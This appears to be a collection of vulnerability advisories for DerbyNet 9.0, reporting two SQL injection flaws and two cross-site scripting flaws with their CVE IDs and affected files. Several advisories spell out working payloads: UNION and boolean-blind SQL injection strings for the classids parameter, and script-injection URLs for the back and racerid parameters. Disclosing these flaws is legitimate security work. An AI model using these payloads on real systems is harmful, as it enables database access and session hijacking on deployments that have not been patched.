    CVE ID: CVE-2024-30922Description:A SQL Injection vulnerability has been identified in DerbyNet version 9.0, specifically affecting the 'where' clause in Award Document Rendering through the component `print/render/award.inc`. This vulnerability allows remote attackers to execute arbitrary code and disclose sensitive information without requiring authentication.Vulnerability Type: SQL InjectionVendor of Product: DerbyNet - Available on GitHub: https://github.com/jeffpiazza/derbynetAffected Product Code Base: DerbyNet - v9.0Affected Component: print/render/award.incAttack Type: RemoteImpact:- Code execution: True- Information Disclosure: TrueAttack Vectors:The vulnerability in the document rendering endpoint, particularly within `print/render/award.inc`, is exposed to an unauthenticated SQL Injection. This flaw allows attackers to manipulate SQL queries by injecting malicious SQL code, potentially leading to unauthorized data access and manipulation.Discoverer: Valentin LobsteinReferences:- Official website: http://derbynet.com- Source code on GitHub: https://github.com/jeffpiazza/derbynet

DerbyNet 9.0 print/render/award.inc SQL Injection

DerbyNet 9.0 suffers from a remote SQL injection vulnerability in ajax/query.slide.next.inc.

    CVE ID: CVE-2024-30928Description:An SQL Injection vulnerability has been discovered in DerbyNet version 9.0, particularly within the `ajax/query.slide.next.inc` file. This vulnerability allows remote attackers to execute arbitrary code and disclose sensitive information by exploiting the unvalidated `classids` parameter used in constructing SQL queries. This parameter is not properly sanitized before being included in the SQL statement, leading to a critical risk of SQL Injection.Vulnerability Type: SQL InjectionVendor of Product: DerbyNet - Available on GitHub: https://github.com/jeffpiazza/derbynetAffected Product Code Base: DerbyNet - v9.0Affected Component: ajax/query.slide.next.incAttack Type: RemoteImpacts:- Code execution: True- Information Disclosure: TrueAttack Vectors:The vulnerability is primarily exploited by manipulating the `classids` parameter in the user's request to the `ajax/query.slide.next.inc` file. The lack of adequate input validation allows attackers to inject malicious SQL code through this parameter. Example attack vectors include:- Direct exploitation:- `http://127.0.0.1:8000/action.php?query=slide.next&mode=racer&classids=1`- Boolean-based blind SQL Injection:- Payload: `query=slide.next&mode=racer&classids=1) AND 4365=4365 AND (6880=6880`- UNION query SQL Injection:- Payload: `query=slide.next&mode=racer&classids=-3890) UNION ALL SELECT NULL,NULL,CHAR(113,107,120,122,113)||CHAR(79,97,117,85,112,79,82,85,75,114,65,66,118,100,117,107,79,118,111,104,67,105,87,86,72,110,107,119,113,86,106,107,115,100,110,109,98,77,85,115)||CHAR(113,118,120,120,113),NULL,NULL,NULL,NULL,NULL-- rDzQ`These vectors demonstrate how an attacker could manipulate SQL queries to potentially access or manipulate database information unauthorizedly.Discoverer: Valentin LobsteinReferences:- Official website: http://derbynet.com- Source code on GitHub: https://github.com/jeffpiazza/derbynet

DerbyNet 9.0 ajax/query.slide.next.inc SQL Injection

DerbyNet version 9.0 suffers from a cross site scripting vulnerability in playlist.php.

    CVE ID: CVE-2024-30929Description:A Cross-Site Scripting (XSS) vulnerability has been found in DerbyNet version 9.0, affecting the `playlist.php` component. This issue allows remote attackers to execute arbitrary code by exploiting the `back` parameter. The application does not properly sanitize the `back` parameter before it is rendered on the page, thereby allowing the injection and execution of arbitrary JavaScript code.Vulnerability Type: Cross-Site Scripting (XSS)Vendor of Product: DerbyNet - Available on GitHub: https://github.com/jeffpiazza/derbynetAffected Product Code Base: DerbyNet - v9.0Affected Component: playlist.phpAttack Type: RemoteImpact: Code executionAttack Vectors:The vulnerability can be exploited by crafting a URL that includes malicious JavaScript code as part of the `back` parameter. An example of such a URL is:- http://127.0.0.1:8000/playlist.php?back="><script>alert(1)</script>This example demonstrates how an attacker could inject and execute JavaScript within the context of the webpage, leading to potential security risks such as session hijacking, phishing, or unauthorized actions performed on behalf of the user.Discoverer: Valentin LobsteinReferences:- Official website: http://derbynet.com- Source code on GitHub: https://github.com/jeffpiazza/derbynet

DerbyNet 9.0 playlist.php Cross Site Scripting

DerbyNet version 9.0 suffers from a cross site scripting vulnerability in racer-results.php.

CVE ID: CVE-2024-30927

Description:  
A Cross-Site Scripting (XSS) vulnerability is present in DerbyNet version 9.0, specifically within the `racer-results.php` component. This issue allows remote attackers to execute arbitrary code through the improper handling of the `racerid` parameter. The vulnerability is notably present within the HTML `<title>` tag, where the `racerid` parameter value is dynamically inserted directly into the page content without any sanitization or encoding.

Vulnerability Type: Cross-Site Scripting (XSS)

Vendor of Product: DerbyNet - Available on GitHub: https://github.com/jeffpiazza/derbynet

Affected Product Code Base: DerbyNet - v9.0

Affected Component: racer-results.php

Attack Type: Remote

Impact: Code execution

Attack Vectors:  
The XSS vulnerability can be exploited by inserting malicious JavaScript code into the `racerid` parameter of the URL. For example:  
- `http://127.0.0.1:8000/racer-results.php?racerid=</title><script>alert(1)</script>`

This method demonstrates how an attacker could manipulate the `racerid` parameter to inject and execute arbitrary JavaScript within the context of a user's session.

Discoverer: Valentin Lobstein

References:  
- Official website: http://derbynet.com  
- Source code on GitHub: https://github.com/jeffpiazza/derbynet

Tag

#vulnerability